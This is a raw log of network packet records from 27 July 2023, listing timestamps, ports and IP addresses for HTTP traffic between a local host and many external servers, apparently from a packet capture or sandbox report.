                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.466078043 CEST5010680192.168.2.4135.181.73.98
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.466550112 CEST8050109192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.466984987 CEST8050109192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.467067003 CEST5010980192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.487462997 CEST805010152.86.6.113192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.488466024 CEST805010789.161.163.246192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.489034891 CEST805010789.161.163.246192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.489082098 CEST805010789.161.163.246192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.489223957 CEST5010780192.168.2.489.161.163.246
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.500745058 CEST8050100192.241.158.94192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.503817081 CEST5010080192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.528065920 CEST8049803192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.528234005 CEST4980380192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.529011965 CEST8050110192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.529177904 CEST5011080192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.566621065 CEST805010852.86.6.113192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.567830086 CEST5010880192.168.2.452.86.6.113
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.677771091 CEST5010980192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.677865028 CEST5011080192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.687477112 CEST5010880192.168.2.452.86.6.113
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.696877003 CEST8050109192.124.249.10192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.697083950 CEST5010980192.168.2.4192.124.249.10
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.714730978 CEST8050102170.82.174.30192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.714899063 CEST5010280192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.735948086 CEST8049804202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.737462997 CEST8050111202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.737628937 CEST5011180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.775975943 CEST8050110192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.778155088 CEST8050110192.252.154.18192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.778290987 CEST5011080192.168.2.4192.252.154.18
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.802256107 CEST5011180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.826205969 CEST805010852.86.6.113192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.826260090 CEST805010852.86.6.113192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.826392889 CEST5010880192.168.2.452.86.6.113
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.857669115 CEST5010280192.168.2.4170.82.174.30
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.865848064 CEST5010880192.168.2.452.86.6.113
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:22.997929096 CEST5011280192.168.2.454.209.32.212
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.004537106 CEST805010852.86.6.113192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.024898052 CEST4980580192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025346994 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025404930 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025454044 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025496006 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025496960 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025501966 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025544882 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025544882 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025547981 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025589943 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025595903 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025640965 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025643110 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025686979 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025686979 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025732994 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025732994 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025777102 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025784969 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.025830030 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.026088953 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.026159048 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.026176929 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.026215076 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.026215076 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.026257992 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.026261091 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.026304007 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.026307106 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.026350975 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.027127981 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.027187109 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.027225971 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.027252913 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.027290106 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.027304888 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.027307987 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.027349949 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.027353048 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.027395010 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.028121948 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.028170109 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.028196096 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.028217077 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.028228998 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.028285027 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.028306961 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.028342962 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.028354883 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.028404951 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.029002905 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.029051065 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.029084921 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.029098988 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.029104948 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.029145002 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.029153109 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.029191017 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.029217005 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.029247999 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.041971922 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.041982889 CEST5011380192.168.2.460.43.154.138
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042074919 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042126894 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042155981 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042160034 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042195082 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042201996 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042232037 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042249918 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042258978 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042294025 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042309046 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.042355061 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.043030024 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.043092012 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.043114901 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.043174028 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.043174028 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.043212891 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.043220043 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.043271065 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.043303967 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.043374062 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.043953896 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.044002056 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.044037104 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.044064045 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.044065952 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.044106960 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.044116020 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.044164896 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.044167995 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.044214964 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045005083 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045053005 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045078039 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045098066 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045099020 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045145035 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045145988 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045182943 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045185089 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045228958 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045736074 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045785904 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045790911 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045830011 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045830965 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045876026 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045876980 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045922041 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045923948 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.045965910 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.046739101 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.046788931 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.046797991 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.046835899 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.046838045 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.046880007 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.046881914 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.046922922 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.046928883 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.046971083 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.047693968 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.047755003 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.047765017 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.047830105 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.047838926 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.047919035 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.047935963 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.047972918 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048011065 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048115015 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048625946 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048675060 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048690081 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048738003 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048746109 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048791885 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048794985 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048837900 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048877001 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.048922062 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.049559116 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.049613953 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.049652100 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.049668074 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.049671888 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.049710035 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.049714088 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.049760103 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.049762011 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.049810886 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.050497055 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.050545931 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.050558090 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.050592899 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.050595045 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.050641060 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.050642014 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.050684929 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.050688982 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.050731897 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.051455021 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.051505089 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.051511049 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.051549911 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.051549911 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.051594973 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.051595926 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.051647902 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.051651955 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.051697016 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.052381039 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.052428961 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.052434921 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.052469969 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.052474022 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.052517891 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.055403948 CEST4981380192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.056768894 CEST5011480192.168.2.4188.165.133.163
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058515072 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058597088 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058614969 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058650970 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058687925 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058689117 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058723927 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058728933 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058758974 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058788061 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058799982 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.058845997 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.059626102 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.059660912 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.059685946 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.059715986 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.059720993 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.059767008 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.059768915 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.059807062 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.059811115 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.059854984 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.060698986 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.060754061 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.060759068 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.060822010 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.060906887 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.060944080 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.060961962 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061017036 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061044931 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061070919 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061397076 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061415911 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061451912 CEST8050098172.67.70.22192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061467886 CEST5009880192.168.2.4172.67.70.22
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:23.061469078 CEST5009880192.168.2.4172.67.70.22
